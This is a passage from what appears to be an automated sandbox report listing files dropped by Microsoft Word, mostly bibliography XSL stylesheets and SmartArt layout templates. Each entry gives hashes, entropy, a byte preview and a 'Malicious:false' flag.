/>.......<xsl:with-param name="parameters" select="$para
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):288
    Entropy (8bit):3.523917709458511
    Encrypted:false
    SSDEEP:6:fxnxUXC1l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnySvNGHmD0wbnKYZAH/lMZqiv
    MD5:4A9A2E8DB82C90608C96008A5B6160EF
    SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
    SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
    SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):296658
    Entropy (8bit):5.000002997029767
    Encrypted:false
    SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
    MD5:9AC6DE7B629A4A802A41F93DB2C49747
    SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
    SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
    SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):238
    Entropy (8bit):3.472155835869843
    Encrypted:false
    SSDEEP:6:fxnxUXGE2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny4GHmD0+dAH/luWvv
    MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
    SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
    SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
    SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):5151
    Entropy (8bit):7.859615916913808
    Encrypted:false
    SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
    MD5:6C24ED9C7C868DB0D55492BB126EAFF8
    SHA1:C6D96D4D298573B70CF5C714151CF87532535888
    SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
    SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
    Malicious:false
    Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):252
    Entropy (8bit):3.4680595384446202
    Encrypted:false
    SSDEEP:6:fxnxUXivlE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyydGHmD0+dAH/luWvv
    MD5:D79B5DE6D93AC06005761D88783B3EE6
    SHA1:E05BDCE2673B6AA8CBB17A138751EDFA2264DB91
    SHA-256:96125D6804544B8D4E6AE8638EFD4BD1F96A1BFB9EEF57337FFF40BA9FF4CDD1
    SHA-512:34057F7B2AB273964CB086D8A7DF09A4E05D244A1A27E7589BDC7E5679AB5F587FAB52A2261DB22070DA11EF016F7386635A2B8E54D83730E77A7B142C2E3929
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .a.r.c.h.i.t.e.c.t.u.r.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):5783
    Entropy (8bit):7.88616857639663
    Encrypted:false
    SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
    MD5:8109B3C170E6C2C114164B8947F88AA1
    SHA1:FC63956575842219443F4B4C07A8127FBD804C84
    SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
    SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
    Malicious:false
    Preview:PK.........A;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........pnB;.M.:....g......._rels/.rels...J.0.._%.n....xp..,{.i2M.........G..........7...3o/.......d.kyU....^..[>Q....j.#P.H......Z>..+!...B*|@...G...E....E]..".3.......!..7....,:..,.......Ot..0r....Z..&1..U..p.U-.[Uq&.......................Gyy.}n.(.C(i.x........?.vM..}..%.7.b.>L..]..PK........EV:5K..4....H......diagrams/layout1.xml.Yo.6........S.`......$M...Q8A...R..T.k...K.4CQG..}.A..9.?R....!&...Q..ZW.......Q....<8..z..g....4{d.>..;.{.>.X.....Y.2.......cR....9e.. ...}L.....yv&.&...r..h...._..M. e...[..}.>.k..........3.`.ygN...7.w..3..W.S.....w9....r(....Zb..1....z...&WM.D<......D9...ge......6+.Y....$f......wJ$O..N..FC..Er........?..is...-Z
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):246
    Entropy (8bit):3.5039994158393686
    Encrypted:false
    SSDEEP:6:fxnxUX4f+E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvGHmD0+dAH/luWvv
    MD5:16711B951E1130126E240A6E4CC2E382
    SHA1:8095AA79AEE029FD06428244CA2A6F28408448DB
    SHA-256:855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
    SHA-512:454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.b.e.d.A.r.c...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
    Category:dropped
    Size (bytes):3683
    Entropy (8bit):7.772039166640107
    Encrypted:false
    SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
    MD5:E8308DA3D46D0BC30857243E1B7D330D
    SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
    SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
    SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
    Malicious:false
    Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):292
    Entropy (8bit):3.5026803317779778
    Encrypted:false
    SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
    MD5:A0D51783BFEE86F3AC46A810404B6796
    SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
    SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
    SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.t.i.t.l.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):251032
    Entropy (8bit):5.102652100491927
    Encrypted:false
    SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
    MD5:F425D8C274A8571B625EE66A8CE60287
    SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
    SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
    SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):254
    Entropy (8bit):3.4845992218379616
    Encrypted:false
    SSDEEP:6:fxnxUXQFoElh/lE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8lLGHmD0+dAH/luWvv
    MD5:E8B30D1070779CC14FBE93C8F5CF65BE
    SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
    SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
    SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .H.e.x.a.g.o.n.R.a.d.i.a.l...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):6024
    Entropy (8bit):7.886254023824049
    Encrypted:false
    SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
    MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
    SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
    SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
    SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
    Malicious:false
    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):332
    Entropy (8bit):3.547857457374301
    Encrypted:false
    SSDEEP:6:fxnxUXSpGLMeKlPaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyipTIw9eNGHmD0wbnKYZAH/lMZqiv
    MD5:4EC6724CBBA516CF202A6BD17226D02C
    SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
    SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
    SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
    Category:dropped
    Size (bytes):284415
    Entropy (8bit):5.00549404077789
    Encrypted:false
    SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
    MD5:33A829B4893044E1851725F4DAF20271
    SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
    SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
    SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):374
    Entropy (8bit):3.5414485333689694
    Encrypted:false
    SSDEEP:6:fxnxUX8FaE3f8AWqlQqr++lcWimqnKOE3QepmlJ0+3FbnKfZObdADryMluxHZypo:fxnyj9AWI+acgq9GHmD0wbnKYZAH/lMf
    MD5:2F7A8FE4E5046175500AFFA228F99576
    SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
    SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
    SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft Word 2007+
    Category:dropped
    Size (bytes):47296
    Entropy (8bit):6.42327948041841
    Encrypted:false
    SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
    MD5:5A53F55DD7DA8F10A8C0E711F548B335
    SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
    SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
    SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
    Malicious:false
    Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):332
    Entropy (8bit):3.4871192480632223
    Encrypted:false
    SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
    MD5:333BA58FCE326DEA1E4A9DE67475AA95
    SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
    SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
    SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.l.a.s.e.v.e.n.t.h.e.d.i.t.i.o.n.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):254875
    Entropy (8bit):5.003842588822783
    Encrypted:false
    SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
    MD5:377B3E355414466F3E3861BCE1844976
    SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
    SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
    SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):262
    Entropy (8bit):3.4901887319218092
    Encrypted:false
    SSDEEP:6:fxnxUXqhBMl0OoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyiMl0OoGHmD0+dAH/luWvv
    MD5:52BD0762F3DC77334807DDFC60D5F304
    SHA1:5962DA7C58F742046A116DDDA5DC8EA889C4CB0E
    SHA-256:30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB
    SHA-512:FB68B1CF9677A00D5651C51EC604B61DAC2D250D44A71D43CD69F41F16E4F0A7BAA7AD4A6F7BB870429297465A893013BBD7CC77A8F709AD6DB97F5A0927B1DD
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .R.a.d.i.a.l.P.i.c.t.u.r.e.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
